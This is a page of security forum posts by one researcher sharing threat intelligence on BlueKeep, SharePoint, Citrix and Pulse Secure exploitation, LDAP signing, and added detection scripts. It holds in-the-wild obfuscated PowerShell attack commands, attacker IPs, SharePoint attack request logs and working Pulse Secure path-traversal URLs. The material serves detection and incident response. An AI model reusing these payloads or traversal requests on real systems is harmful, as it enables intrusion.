OpenSecurity.global

Kevin Beaumont


Posts posted by Kevin Beaumont


  1. Seeing some minor variation of BlueKeep attack behaviour (maybe attackers updated Metasploit finally). I'm seeing some stable-ish exploitation of Windows 7 this week; however, they're failing to run commands properly.  Example commands:

    CommandLine:
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "( [runtiMe.IntErOPServicEs.mARSHaL]::([rUnTIMe.INteroPSErvIcEs.MarShal].Getmembers()[2].nAMe).iNVOKE( [runTiMe.inTErOPSerVicEs.MArshAL]::sEcURESTRiNGToglOBAlALloCUnIcOde( $('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' | COnvERtTO-secureSTriNg -k 233,15,104,145,89,224,141,140,14,129,234,189,3,99,170,12,187,51,142,37,87,56,187,247,167,194,37,235,247,182,23,164) )))|&( $eNV:COMSpEc[4,24,25]-jOin'')"
    CommandLine:
    powershell -w hiDDeN (NeW-obJeCt Io.COmPRessioN.dEFLatesTREAM([sySteM.Io.MEMoRYstREAM][SySTeM.COnveRt]::FroMBase64STRiNG('NY5PT4NAFMS/CgeS0kOX1lC0NL1I1ZPVpP45EA/LMpZXt2/J8pQmxu/ukuicJvObTKbaQdQe/osMHh2x3GvWB/i3ohhT+BJe6J2MFrxoS40Wclxqa2ttPqJN9B2L/8TPOu42SfWEs6gbNq4hPoSJZ6bgoe4ge/EhS5KqdBxmJdBb707Xukee/cMdhtlDfYSRaPz1irq0BJap2rqBrdPNX3PSinR9kaaXVyrL1eIiU/mqWMznq2VK3OCsWjnZyXTUunMDfN/C2ijufgE=' ), [systEm.io.comprESSion.ComPRESsIonmOdE]::decoMprESS ) |FoREAch { NeW-obJeCt iO.STrEamReaDer( $_, [Text.eNcoDiNg]::aScii )} ).rEAdtoENd( )| invokE-EXpREsSiOn

    Additional IoCs.  Application event 1000, spawning Powershell.exe:

    [screenshot]

    This event spawns from C:\Windows\system32\UI0Detect.exe and UI0Detect.exe 224 (224 is the parameter).

    spoolsv.exe crash:

    [screenshot]


    They check the device has more than 3.5 GB of RAM and is 64-bit, then try running a payload.

    [screenshot]

    Network IOC 78.46.124.69 port 10095
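    An added hunt for the process chain described in this post (powershell.exe spawned by UI0Detect.exe); this is not code from the post. It assumes Sysmon is installed so that Event ID 1 carries ParentImage and ParentCommandLine; the sample event is constructed for offline testing.

```powershell
# Added example (not from the original post): hunt for the BlueKeep follow-on chain
# described above, powershell.exe being spawned by UI0Detect.exe, in Sysmon process
# creation events (Event ID 1). Assumes Sysmon is installed; without it, Security
# event 4688 with command-line auditing is the fallback. The sample event below is
# constructed for offline testing and is not a real capture.

function Test-UI0DetectPowerShell {
    param([xml]$EventXml)   # one Sysmon event, e.g. [xml]$evt.ToXml()
    # Flatten <Data Name="...">value</Data> pairs into a hashtable.
    $data = @{}
    foreach ($d in $EventXml.Event.EventData.Data) { $data[$d.GetAttribute('Name')] = $d.InnerText }
    $parent = [string]$data['ParentImage']
    $image  = [string]$data['Image']
    # -match is case-insensitive, so System32 vs system32 does not matter.
    if ($parent -match '\\UI0Detect\.exe$' -and $image -match '\\powershell\.exe$') {
        [pscustomobject]@{
            UtcTime       = $data['UtcTime']
            Computer      = $EventXml.Event.System.Computer
            ParentCommand = $data['ParentCommandLine']   # the post shows "UI0Detect.exe 224"
            CommandLine   = $data['CommandLine']
        }
    }
}

function Find-UI0DetectPowerShell {
    # Live hunt over the local Sysmon log; emits one object per matching process creation.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
        ForEach-Object { Test-UI0DetectPowerShell -EventXml ([xml]$_.ToXml()) }
}

# Constructed sample event, trimmed to the fields the check reads.
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID><Computer>WIN7-TEST</Computer></System>
  <EventData>
    <Data Name="UtcTime">2019-11-02 10:15:00.000</Data>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell -w hiDDeN (NeW-obJeCt Io.COmPRessioN.dEFLatesTREAM(...))</Data>
    <Data Name="ParentImage">C:\Windows\System32\UI0Detect.exe</Data>
    <Data Name="ParentCommandLine">UI0Detect.exe 224</Data>
  </EventData>
</Event>
'@
Test-UI0DetectPowerShell -EventXml ([xml]$sample) | Format-List
```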


  2. So I saw some exploitation of this in wild yesterday, looks like:


    GET /_layouts/15/Picker.aspx - 80 - 84.16.244.47 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 359
    GET /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 84.16.244.47 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 312
    POST /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 84.16.244.47 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 1312
    GET /_layouts/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 302 0 0 46
    GET /_layouts/15/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 374
    GET /_layouts/15/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 31
    GET /_layouts/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 302 0 0 281
    GET /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 421
    GET /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 578
    POST /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 468
    GET /_layouts/15/downloadexternaldata.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 10578
    POST /_layouts/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 8984
    GET /_layouts/15/downloadexternaldata.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 93
    POST /_layouts/15/downloadexternaldata.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 124

    Obviously the POST statements aren't there.

    Triggers code execution like this:

    [screenshot]
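    An added detection over IIS W3C logs for the Picker.aspx pattern in this post; this is not code from the post. It assumes the default IIS field order with a #Fields header; the three log lines are constructed for offline testing (server IP and timestamps made up, client IP and request shapes copied from the post).

```powershell
# Added example (not from the original post): flag the Picker.aspx request pattern shown
# above in an IIS W3C log. Field order is the IIS default; the log lines below are
# constructed (made-up server IP and timestamps, request shapes taken from the post).

function Find-PickerAspxPosts {
    param([string[]]$LogLines)
    $fields = $null
    foreach ($line in $LogLines) {
        if ($line.StartsWith('#Fields:')) {             # column layout for the lines that follow
            $fields = $line.Substring(8).Trim() -split ' '
            continue
        }
        if ($line.StartsWith('#') -or -not $fields -or [string]::IsNullOrWhiteSpace($line)) { continue }
        $values = $line -split ' '
        if ($values.Count -ne $fields.Count) { continue }   # malformed line: skip rather than misalign
        $row = @{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $row[$fields[$i]] = $values[$i] }
        # -match is case-insensitive; the /15/ segment is optional (the post shows both paths)
        $stemHit  = $row['cs-uri-stem']  -match '^/_layouts/(15/)?picker\.aspx$'
        $queryHit = $row['cs-uri-query'] -match 'PickerDialogType=.*ItemPickerDialog'
        if ($row['cs-method'] -eq 'POST' -and $stemHit -and $queryHit) {
            [pscustomobject]@{
                When     = "$($row['date']) $($row['time'])"
                ClientIP = $row['c-ip']
                Status   = $row['sc-status']
                Uri      = $row['cs-uri-stem']
            }
        }
    }
}

# Constructed sample log: one benign GET, the POST that should be flagged, one follow-up GET.
$sampleLog = @'
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2019-10-23 09:12:01 10.0.0.5 GET /_layouts/15/Picker.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 374
2019-10-23 09:12:02 10.0.0.5 POST /_layouts/15/Picker.aspx PickerDialogType=Microsoft.SharePoint.WebControls.ItemPickerDialog,+Microsoft.SharePoint,+Version=15.0.0.0,+Culture=neutral,+PublicKeyToken=71e9bce111e9429c 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 200 0 0 468
2019-10-23 09:12:03 10.0.0.5 GET /_layouts/15/downloadexternaldata.aspx - 80 - 82.102.21.249 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 401 0 0 10578
'@
Find-PickerAspxPosts -LogLines ($sampleLog -split '\r?\n') | Format-Table -AutoSize
# Against a real log: Find-PickerAspxPosts -LogLines (Get-Content C:\inetpub\logs\LogFiles\W3SVC1\u_ex191023.log)
```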


  3. In March this year, Microsoft plan to change LDAP (an authentication system) behaviour so you are required to make connections which are signed and basically secure.  If you have systems which authenticate with Active Directory in an insecure way, they will break post-update.

    More info here:

    https://support.microsoft.com/en-us/help/4520412/2020-ldap-channel-binding-and-ldap-signing-requirement-for-windows

    https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV190023

    This is a big change which may have production impacts, i.e. systems may break.

    How to identify systems which will break

    Go to your domain controllers and look for Event ID 2887:

    Product: Windows Operating System
    ID: 2887
    Source: Microsoft-Windows-ActiveDirectory_DomainService
    Message: During the previous 24 hour period, some clients attempted to perform LDAP binds that were either:
    (1) A SASL (Negotiate, Kerberos, NTLM, or Digest) LDAP bind that did not request signing (integrity validation), or
    (2) A LDAP simple bind that was performed on a cleartext (non-SSL/TLS-encrypted) connection

    If you see this error, you need to take action as something will break.

    You can manually enable LDAP interface event logging, and afterwards Event ID 2889 will be logged in the same location with the IP addresses of clients using insecure LDAP.

    On each DC:

    # Enable Simple LDAP Bind Logging 
    Reg Add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics /v "16 LDAP Interface Events" /t REG_DWORD /d 2

    This will get you the IP addresses of systems using insecure LDAP. The next issue is to get them to... not do that.  Over to you!

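    An added script to summarise the Event ID 2889 records once the logging above is enabled; this is not code from the post. It assumes the 2889 message text carries the fixed phrases "Client IP address:", "Identity the client attempted to authenticate as:" and "Binding Type:" (0 for an unsigned SASL bind, 1 for a cleartext simple bind); the sample message is constructed in that shape for offline testing.

```powershell
# Added example (not from the original post): after enabling "16 LDAP Interface Events",
# summarise the Event ID 2889 records in the Directory Service log per client IP, account
# and bind type, so you know which systems to fix first. The parser keys on the fixed
# phrases of the 2889 message text (an assumption about its format); the sample message
# below is constructed in that shape for offline testing.

function ConvertFrom-Ldap2889Message {
    param([string]$Message)
    $pattern = 'Client IP address:\s*(\S+)\s*Identity the client attempted to authenticate as:\s*([^\r\n]*?)\s*Binding Type:\s*(\d+)'
    if ($Message -notmatch $pattern) { return }    # not a 2889 body in the expected shape
    $endpoint, $identity, $type = $Matches[1], $Matches[2], [int]$Matches[3]
    $bindType = switch ($type) {
        0       { 'SASL bind without signing' }    # Negotiate/Kerberos/NTLM/Digest, unsigned
        1       { 'Simple bind over cleartext' }
        default { "unknown ($_)" }
    }
    [pscustomobject]@{
        ClientIP = $endpoint -replace ':\d+$', ''   # drop the source port, keeps IPv6 intact
        Identity = if ($identity) { $identity } else { '<anonymous>' }
        BindType = $bindType
    }
}

function Get-InsecureLdapBindSummary {
    # Live query against one DC; run it against each DC, since 2889 is logged per DC.
    param([string]$DomainController = $env:COMPUTERNAME, [int]$Hours = 24)
    $filter = @{ LogName = 'Directory Service'; Id = 2889; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object { ConvertFrom-Ldap2889Message -Message $_.Message } |
        Group-Object ClientIP, Identity, BindType |
        ForEach-Object {
            [pscustomobject]@{ Binds = $_.Count; ClientIP = $_.Group[0].ClientIP
                               Identity = $_.Group[0].Identity; BindType = $_.Group[0].BindType }
        } | Sort-Object Binds -Descending
}

# Constructed sample 2889 message (not a real event).
$sample = @'
The following client performed a SASL (Negotiate/Kerberos/NTLM/Digest) LDAP bind without requesting signing (integrity verification), or performed a simple bind over a clear text (non-SSL/TLS-encrypted) LDAP connection.

Client IP address:
10.0.0.7:49152
Identity the client attempted to authenticate as:
CONTOSO\svc-scanner
Binding Type:
1
'@
ConvertFrom-Ldap2889Message -Message $sample
```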

  4. The boilerplate description

    "A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution."

    What it means in practice

    Unauthenticated remote code execution on internet connected Citrix Gateway devices = bad.

    Are attackers actually exploiting this vulnerability?

    Yes, at scale, against targeted and untargeted assets.

    Impact

    Lame stuff like coin miners, but also devices getting backdoored, and people trying to use this to deploy ransomware inside Windows orgs behind the Citrix boxes.

    Vendor advisory and patches

    Here: https://support.citrix.com/article/CTX267027

    Checking if your device has already been exploited

    Check out this tool, which is getting frequent updates: https://github.com/fireeye/ioc-scanner-CVE-2019-19781/tree/v1.2

    Scale of the issue

    Somewhere in the region of ~100k devices were exploitable with this back in December.  After a huge awareness campaign via all sorts of orgs, this one is at about ~10k unpatched devices at present.  Those orgs are still in serious danger of exploitation.

    If you patched late

    You want to run the FireEye tool linked above to look for exploitation, as attackers may have backdoored your device.

    I just applied the mitigations

    You should also apply the patch, as it hardens the setup - just the mitigations alone present some issues.


  5. On 9/18/2019 at 10:35 PM, Steve Walsh said:

    Cheers guys. My org recently had a sextortion attack. Used 1647 unique Outlook addresses with a PDF attached which was password protected. The name of the PDF was the name of a previously used password, and contained within the PDF was the usual sextortion bullshit with a link to a wallet. All mails involved were in Have I Been Pwned. So I'd like to connect with the API to do password audits.

    That probably isn't the use case for HIBP, e.g. they don't provide passwords.


  6. I did a PoC with it at Crabbers back in 2016, but didn't reach the pentesting phase I'm afraid.  I aborted out of it for cost reasons more than anything, and at the time the product functionality wasn't very broad (I bet it has improved a lot since).

    With Windows 10 nowadays it has lots of exploit protection built in, e.g. at current jobbing we have all the different exploit prevention technology turned on with Group Policy in Windows 10 pilot:

    [screenshot]


  7. Some logs you can retrieve with this remotely:

    • https://host/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/logs/log.admin.vc0?/dana/html5acc/guacamole/
    • https://host/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/logs/log.access.vc0?/dana/html5acc/guacamole/

    As an attacker you can use these to figure out to some degree if the box has been tampered with already.

    Note that to have a hope of figuring out exactly what attackers tampered with, you need to manually (it is disabled by default) enable "Unauthenticated Web Requests" logging under System -> Logs/Monitoring in the Pulse Secure admin centre.  As a result of this many orgs compromised before they installed the patch will not realise if attackers have created backdoors, and they may still be compromised.  I recommend turning on logging, and looking at the admin logs - it won't catch everything (because HTTP requests aren't logged) but you might find other signs of tampering.

    Shoutout to Alyssa Herrera who continues to figure out this vulnerability.
